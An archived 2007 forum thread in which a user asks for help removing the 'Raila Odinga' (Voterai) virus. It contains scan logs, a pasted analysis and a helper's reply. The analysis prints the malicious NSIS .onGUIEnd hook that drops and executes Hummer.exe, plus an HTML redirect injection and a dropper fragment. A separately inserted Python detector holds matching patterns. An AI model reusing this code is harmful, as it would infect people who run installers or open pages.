
Raila Virus alias Trojaj.NSIS.Voter.a

Discussion in 'Malware and Virus Removal Archive' started by Kile, 2007/09/29.

  1. 2007/09/29
    Kile

    Hello,
    I have been infected by the Raila Odinga Virus or Voterai.a Virus. I have tried to use AVG and McAfee, but the virus is neither detected nor removed. I installed HijackThis and SmitFraudFix:

    These are the results of HijackThis and SmitFraudFix:

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 12:32:56 PM, on 9/29/2007
    Platform: Windows XP SP2 (WinNT 5.01.2600)
    MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\Program Files\Comodo\CBOClean\BOCORE.exe
    C:\Program Files\Comodo\Firewall\cmdagent.exe
    C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\system32\lvhidsvc.exe
    c:\program files\mcafee.com\agent\mcdetect.exe
    c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
    C:\WINDOWS\system32\wdfmgr.exe
    c:\program files\mcafee.com\vso\mcvsshld.exe
    c:\progra~1\mcafee.com\vso\mcvsescn.exe
    c:\program files\mcafee.com\agent\mcagent.exe
    C:\Program Files\Nero\Nero 7\InCD\InCD.exe
    C:\WINDOWS\system32\igfxtray.exe
    C:\WINDOWS\system32\hkcmd.exe
    C:\WINDOWS\system32\igfxpers.exe
    C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
    C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
    C:\Program Files\Winamp\winampa.exe
    C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\avpo.exe
    C:\WINDOWS\system32\drivers\scan.exe
    C:\WINDOWS\system32\taskmgr.exe
    C:\Program Files\TVR\TVR\RecSche.EXE
    C:\WINDOWS\System32\alg.exe
    C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
    C:\WINDOWS\system32\drivers\autorun.exe
    C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
    C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
    C:\WINDOWS\system32\drivers\scan.exe
    C:\WINDOWS\system32\drivers\scan0002.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\Winamp\winamp.exe
    C:\WINDOWS\system32\NOTEPAD.EXE
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
    C:\Program Files\Windows NT\Accessories\wordpad.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe
    C:\WINDOWS\system32\spoolsv.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
    O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~2\tools\iesdsg.dll
    O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
    O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
    O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
    O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
    O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
    O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
    O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
    O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe "
    O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
    O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
    O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
    O4 - HKLM\..\Run: [VirusScan Online] C:\Program Files\McAfee.com\VSO\mcvsshld.exe
    O4 - HKLM\..\Run: [OASClnt] C:\Program Files\McAfee.com\VSO\oasclnt.exe
    O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
    O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
    O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
    O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
    O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
    O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
    O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
    O4 - Startup: 2007-09 (Sep).lnk = ?
    O4 - Startup: autorun.lnk = ?
    O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
    O4 - Startup: K'S TAX INVOICE.lnk = ?
    O4 - Startup: ldupver.lnk = ?
    O4 - Startup: scan.lnk = ?
    O4 - Startup: scan0002.lnk = ?
    O4 - Global Startup: TVR Schedule.lnk = ?
    O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
    O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
    O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
    O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
    O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
    O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
    O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\program files\mcafee.com\agent\mcdetect.exe
    O23 - Service: McAfee.com McShield (McShield) - McAfee Inc. - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
    O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
    O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    O23 - Service: PC Tools Spyware Doctor (SDhelper) - PC Tools Research Pty Ltd - C:\Program Files\Spyware Doctor\sdhelp.exe

    --
    End of file - 9149 bytes


    SmitFraudFix v2.227

    Scan done at 12:37:10.87, Sat 09/29/2007
    Run from C:\Documents and Settings\Clement\Desktop\SmitfraudFix
    OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
    The filesystem type is NTFS
    Fix run in normal mode

    »»»»»»»»»»»»»»»»»»»»»»»» Process

    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
    C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
    C:\Program Files\Comodo\CBOClean\BOCORE.exe
    C:\Program Files\Comodo\Firewall\cmdagent.exe
    C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
    C:\Program Files\Common Files\LightScribe\LSSrvc.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\system32\lvhidsvc.exe
    c:\program files\mcafee.com\agent\mcdetect.exe
    c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
    C:\WINDOWS\system32\wdfmgr.exe
    c:\program files\mcafee.com\vso\mcvsshld.exe
    c:\progra~1\mcafee.com\vso\mcvsescn.exe
    c:\program files\mcafee.com\agent\mcagent.exe
    C:\Program Files\Nero\Nero 7\InCD\InCD.exe
    C:\WINDOWS\system32\igfxtray.exe
    C:\WINDOWS\system32\hkcmd.exe
    C:\WINDOWS\system32\igfxpers.exe
    C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
    C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
    C:\Program Files\Winamp\winampa.exe
    C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
    C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
    C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
    C:\WINDOWS\system32\avpo.exe
    C:\WINDOWS\system32\drivers\scan.exe
    C:\WINDOWS\system32\taskmgr.exe
    C:\Program Files\TVR\TVR\RecSche.EXE
    C:\WINDOWS\System32\alg.exe
    C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
    C:\WINDOWS\system32\drivers\autorun.exe
    C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
    C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
    C:\WINDOWS\system32\drivers\scan.exe
    C:\WINDOWS\system32\drivers\scan0002.exe
    C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\Winamp\winamp.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
    C:\Program Files\Windows NT\Accessories\wordpad.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\system32\cmd.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe

    »»»»»»»»»»»»»»»»»»»»»»»» hosts


    »»»»»»»»»»»»»»»»»»»»»»»» C:\


    »»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS


    »»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system


    »»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web


    »»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32


    »»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement


    »»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement\Application Data


    »»»»»»»»»»»»»»»»»»»»»»»» Start Menu


    »»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Clement\FAVORI~1


    »»»»»»»»»»»»»»»»»»»»»»»» Desktop


    »»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files


    »»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys


    »»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0]
    "Source "= "About:Home "
    "SubscribedURL "= "About:Home "
    "FriendlyName "= "My Current Home Page "


    »»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
    !!!Attention, following keys are not inevitably infected!!!

    SrchSTS.exe by S!Ri
    Search SharedTaskScheduler's .dll


    »»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
    !!!Attention, following keys are not inevitably infected!!!

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
    "AppInit_DLLs "=" "


    »»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
    !!!Attention, following keys are not inevitably infected!!!

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "System "=" "


    »»»»»»»»»»»»»»»»»»»»»»»» Rustock



    »»»»»»»»»»»»»»»»»»»»»»»» DNS



    »»»»»»»»»»»»»»»»»»»»»»»» Scanning for wininet.dll infection


    »»»»»»»»»»»»»»»»»»»»»»»» End



    What I found are the following suspicious files:

    O4 - Startup: 2007-09 (Sep).lnk = ?
    O4 - Startup: autorun.lnk = ?
    O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
    O4 - Startup: K'S TAX INVOICE.lnk = ?
    O4 - Startup: ldupver.lnk = ?
    O4 - Startup: scan.lnk = ?
    O4 - Startup: scan0002.lnk = ?

    Whenever you try to click on one of the files it brings up a popup ad, "Vote for Raila Odinga", in any photo editor, or when you log in all the above files open up as popup ads and keep on doing so every few minutes.

    What are the procedures for getting rid of the infection, or what removal tools should I use to remove it and protect my computer against the infection?

    Thanks,

    Kile.

    NB: Please read the following information I got from the internet about the infection:

    Raila Virus
    Aliases: TROJ_VOTERAI.A (Trend Micro), Trojan.NSIS.Voter.a (Kaspersky), Worm/Generic.BQP (Grisoft)

    The uniqueness of the virus is that it seems to urge computer users to vote for a particular presidential candidate and thus subsequently pops up at randomized intervals.

    In the month of June alone, several different versions of the same virus, dubbed Voterai by the McAfee AV firm and given aliases such as W32/Voter-B, were identified and added to the respective firms' AV databases. The virus has been categorized as low risk (it lacks mass mailing capabilities) but rather seems to spread through removable drives and network shares.

    It is estimated to have infected well over 150,000 desktop computers by the end of June in Kenya alone and still remains the most common virus problem experienced in the country at the moment. The virus group that is responsible for the virus is calling itself "Hackers for the Raila Odinga Campaign 2007". Its association with the campaign office has not yet been determined, as our efforts to get a statement on the issue have been unsuccessful.

    Given that several variants of the same virus seem to be released daily, its impact has been felt locally, especially by cybercafe operators, who seem to be incubating the virus. The AV firms are also less concerned (they only reacted after a copy made its way overseas, apparently from a student from JKUAT who had gone abroad and unknowingly carried it on his flash drive. The sample was later submitted to Sophos, who classified it as a worm (Worm/voter.B (Sophos)). We have yet to establish where McAfee, the first AV firm to detect the variant, got their sample) and seem to be reacting too slowly to the threat. Most of the updates are already useless, as new variants of the virus seem to evade detection and use new infection techniques that are undetectable heuristically.

    The initial assessment of the virus, which claimed it to be a Trojan, has since turned out to be wrong, as Kaspersky reclassified the first variants of the virus to the Win32.autorun.XXX series after they realized it could spread through removable drives. The newer variants are harder to detect as they hardly pop up; instead they infect HTML files by appending the code "<META http-equiv='refresh' content='1;URL=http://www.raila2007.com'>" at the end of web documents (.htm, .html), which automatically redirects the page to the site above after 1 second. Other variants append the following code enclosed within a script tag (trimmed for security reasons), Set filesrc = fso.createtextfile("c:\hummer.exe",true), which is meant to copy the virus to the drive and execute it (a method of spreading the virus).

    Only Grisoft's AVG seemed to detect the virus embedded within the document as a VBS worm. Other AVs, including Kaspersky and Norton, couldn't find anything. An additional blank function tag "dummy()" which is repeatedly called in between statements seems to be what makes the virus undetectable. However, Kaspersky heuristics seem to catch the virus when it attempts to execute and flag it as a hidden install (of course a user will think it's a false alarm and probably allow it to execute).

    We've also received reports that a new variant may be infecting zipped files. Although we are yet to confirm this, it is possible to unpack files, infect them and repack them again. But we think that it is highly unlikely, as zip functions would increase the file size of the virus up to 3 times, making it too bulky to spread, and also the zipping processes would be too slow, and that's why most viruses omit this feature. The same reports also indicate that it has mass mailing capabilities (sends itself through Outlook), but this is highly unlikely, as Outlook doesn't allow certain file extensions to be sent, especially executables, unless the virus zips itself before the operation.

    To be exact, here's the AV firms' breakdown:

    Trend Micro Systems...

    W32/Voter-B spreads by copying itself to removable storage devices.
    When first run W32/Voter-B copies itself to:
    <System>\drivers\<random name>.exe and creates the following file:
    <Desktop>\Raila Odinga.gif - clean may be safely deleted.
    W32/Voter-B displays the above mentioned file.
    When W32/Voter-B spreads, it copies itself as well as the following files:
    -- autorun.inf (clean)
    -- autorun.exe (copy of W32/Voter-B)
    -- Ralia Odinga.exe (copy of W32/Voter-B)
    -- Ralia Odinga.gif (clean)
    -- smss.exe (copy of W32/Voter-B)
    W32/Voter-B creates the following registry entry to start itself automatically:
    -- HKCU\Software\Microsoft\Windows\CurrentVersion\Run<original filename>.exe <System>\drivers\<original filename>.exe

    McAfee Antivirus...

    Overview

    Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe", having a filesize of 97.579 bytes.
    Aliases
    * DR/NSIS.Voter.A (H+Bedv)
    * TROJ_VOTERAI.A (Trend)
    * Trojan.NSIS.Voter.a (Kaspersky)
    * Worm/Generic.BQP (Grisoft)

    Characteristics

    Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe", having a filesize of 97.579 bytes. The file is a Nullsoft installer file. Upon running, it drops and displays a picture file of "Raila Odinga"; this is just an attention drawer.

    Apart from copying itself to the system, Raila Odinga.gif is also placed on the desktop and repeatedly opened. In the meantime, the Raila Odinga.exe binary file is silently copied to the Windows directory and a registry entry is created for it:

    * c:\WINDOWS\system32\drivers\Raila Odinga.exe
    * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "(Default)"
    Data: C:\WINDOWS\system32\drivers\Raila Odinga

    It drops an innocent file called "system.dll" having a filesize of 10240 bytes.

    * c:\Documents and Settings\userxyz\Local Settings\Temp\nsf5.tmp\System.dll
    * c:\Documents and Settings\userxyz\Local Settings\Temp\nsv3.tmp\System.dll

    A link file is added as:
    * c:\Documents and Settings\userxyz\Start Menu\Programs\Startup\Raila Odinga.lnk

    Symptoms

    * Presence of a malicious 32 bit PE file originally called "Raila Odinga.exe", having a filesize of 97.579 bytes
    * Picture file "Raila Odinga.gif" being placed on the desktop and repeatedly opened automatically in photo editors

    Advanced analysis

    Based on the 2 AV firms' breakdown, there seems to be a difference in how the virus is being detected. McAfee, the first firm to detect the virus, classifies it as a trojan, while Trend Micro seem to think it is a worm that spreads across removable drives. The differences may occur as they may have obtained different samples of the same virus from various sources. So who's correct? Apparently both.

    The virus seems to have been compiled using a number of different icons most commonly the MS Word icon and the JPEG icon which make it difficult for users to differentiate between the virus and legitimate programs. The virus also seems to copy itself to removable drives and adds an autorun file to the drive to ensure automatic execution when the infected drive is accessed.

    So why are there so many different yet undetectable copies of the same virus with different icons? Simple possibilities may be:

    ---The virus writer collects a number of icons, say 100, and rewrites his code, say, a hundred times and tests all the samples to make sure they are not detected by any of the AV available. Of course this is so impractical and time consuming. Can't work. So we go to option two:

    ---The virus may be carrying its source code along with it, and once it finds a suitable system with a compiler it proceeds to collect icons from the host system and recompiles itself, at the same time changing aspects of its code or downloading the latest code from the internet. Seems practical enough, as some viruses are known to do the same thing. But then it requires too much skillz, which the virus writer may not have.

    ---The most likely way is that the virus infects source code on other users' systems. They proceed to compile the code unknowingly and distribute it. This is difficult to detect, as these programs may be flagged by AV software as malicious, yet the user knows that he acquired the program from a reliable source.

    We have since received an infected source file which we examined and the results are as follows:

    The file confirms option 3, whereby the virus infects source files. Apparently it infects one file (we think). The virus seems to infect a file with the .nsh extension, which belongs to the Nullsoft Installer, also the language that the virus is coded in. It appends the following lines:

    !include "C:\Program Files\NSIS\Contrib\Modern UI\System.nsh" --- normal header declaration
    ---------------------added by the virus-----------------------------
    !define REDIRECT_ME "redirect"
    !ifdef REDIRECT_ME
    Function .onGUIEnd
    SetOutPath "c:\"
    File "$WHEREIS\$filename"
    ExecShell "open" "c:\Hummer.exe"
    FunctionEnd
    !endif

    The code above hijacks the function .onGUIEnd, which usually executes after an installer completes. Basically, during compilation the code above includes the virus file in the installer; when the installation of the particular program completes, the function copies the virus file to c:\Hummer.exe and executes it, infecting your system. We are still yet to determine how effective this technique is or how many installers may be infected. But given that the Nullsoft Install System is largely used by non-Microsoft programmers (Microsoft has its own installer, which uses MSI technology), who are really few and most of whom are very likely to notice the change in the file, it's highly unlikely that this technique poses a major threat.
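Added here as an example, not part of the thread or of any tool it mentions: a small Python triage script that (1) looks for the two textual markers the quoted write-up describes, the meta refresh appended to .htm/.html files and the .onGUIEnd hook appended to .nsh headers, and (2) flags the O4/R1 patterns visible in Kile's HijackThis log (executables running from system32\drivers, a Run value with a blank name, a .vbs Run entry, Startup shortcuts named after those drivers copies, an overridden IE window title). Marker names and helper names are my own; the sample data is constructed from lines quoted in the thread.

```python
import re
from pathlib import Path, PureWindowsPath

# Markers quoted in the write-up: the meta refresh appended to .htm/.html files
# and the .onGUIEnd hook appended to NSIS .nsh headers (marker names are mine).
META_REFRESH_RE = re.compile(
    r"<META\s+http-equiv=['\"]refresh['\"]\s+content=['\"]\d+;URL=http://www\.raila2007\.com['\"]\s*>",
    re.IGNORECASE)
NSH_HOOK_RE = re.compile(
    r'Function\s+\.onGUIEnd.*?ExecShell\s+"open"\s+"c:\\Hummer\.exe".*?FunctionEnd',
    re.IGNORECASE | re.DOTALL)


def find_markers(filename, text):
    """Return the marker names found in one file's text (empty list if clean)."""
    ext = PureWindowsPath(filename).suffix.lower()
    found = []
    if ext in (".htm", ".html") and META_REFRESH_RE.search(text):
        found.append("html-meta-refresh")
    if ext == ".nsh" and NSH_HOOK_RE.search(text):
        found.append("nsh-onguiend-hook")
    return found


def scan_tree(root):
    """Walk a directory (a web root or an NSIS source tree) and map flagged files to markers."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in (".htm", ".html", ".nsh"):
            markers = find_markers(p.name, p.read_text(errors="replace"))
            if markers:
                hits[str(p)] = markers
    return hits


# HijackThis log triage: the O4 and R1 patterns visible in the thread's log.
PROC_RE = re.compile(r"^[A-Za-z]:\\.+\.exe$", re.IGNORECASE)
RUN_RE = re.compile(r"^O4 - (?P<hive>HK\w+(?:\\[^\\]+)?)\\\.\.\\(?P<key>Run\w*): "
                    r"\[(?P<name>[^\]]*)\] (?P<cmd>.*)$")
STARTUP_RE = re.compile(r"^O4 - (?:Global )?Startup: (?P<stem>.+)\.lnk = ")
TITLE_RE = re.compile(r"^R1 - .*Internet Explorer\\Main,Window Title = (?P<title>.+)$")
DRIVERS_DIR = "\\system32\\drivers\\"


def triage_hjt_log(log_text):
    """Return (line, reason) pairs for entries worth a second look."""
    lines = [ln.strip() for ln in log_text.splitlines()]
    # system32\drivers holds kernel .sys files; a user-mode .exe running from it
    # is a finding on its own and lets us pair Startup shortcuts with the copy
    # they launch (scan.lnk <-> drivers\scan.exe in the thread's log).
    driver_exes = {PureWindowsPath(ln).stem.lower(): ln for ln in lines
                   if PROC_RE.match(ln) and DRIVERS_DIR in ln.lower()}
    findings = [(ln, "executable running from the drivers directory")
                for ln in driver_exes.values()]
    for ln in lines:
        m = RUN_RE.match(ln)
        if m:
            cmd = m.group("cmd").strip().strip('"').lower()
            if not m.group("name"):
                findings.append((ln, "Run value with a blank name"))
            if DRIVERS_DIR in cmd:
                findings.append((ln, "Run value launches from the drivers directory"))
            if cmd.endswith(".vbs"):
                findings.append((ln, "Run value launches a script file"))
            continue
        m = STARTUP_RE.match(ln)
        if m and m.group("stem").lower() in driver_exes:
            findings.append((ln, "Startup shortcut named like " + driver_exes[m.group("stem").lower()]))
            continue
        m = TITLE_RE.match(ln)
        if m:
            findings.append((ln, "IE window title overridden: " + m.group("title")))
    return findings


# Constructed samples: log lines copied from this thread and the quoted .nsh block.
SAMPLE_HJT = r"""
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\Program Files\Winamp\winamp.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
"""
SAMPLE_NSH = r'''!ifdef REDIRECT_ME
Function .onGUIEnd
SetOutPath "c:\"
File "$WHEREIS\$filename"
ExecShell "open" "c:\Hummer.exe"
FunctionEnd
!endif
'''

if __name__ == "__main__":
    for line, reason in triage_hjt_log(SAMPLE_HJT):
        print(f"{reason}: {line}")
    print(find_markers("System.nsh", SAMPLE_NSH))
```

Run scan_tree over a recovered web root or NSIS project to find the appended markers; the log triage is a heuristic first pass, not a verdict on each line.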
  2. 2007/09/29
    noahdfear

    Hi Kile,

    You've got several active infections. Let's use another tool to get a better look at things.

    Note: You must be logged onto an account with administrator privileges to complete the following.

    Download Deckard's System Scanner (dss.exe) to your desktop.
    • Close all applications and windows.
    • Double click on dss.exe to run it and follow the prompts.
    • When the scan is complete, two text files will open; main.txt, which will be maximized and extra.txt, which will be minimized.
    Post the contents of main.txt only for now.


    I would also like for you to do an online scan. Please go HERE to run Panda's ActiveScan
